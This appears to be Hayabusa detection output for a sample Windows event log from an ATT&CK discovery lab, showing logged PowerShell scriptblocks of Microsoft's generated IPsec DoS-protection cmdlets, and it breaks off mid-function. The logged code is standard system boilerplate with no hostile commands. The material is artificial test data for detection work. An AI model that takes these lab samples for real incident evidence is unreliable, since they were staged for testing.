Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"arameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 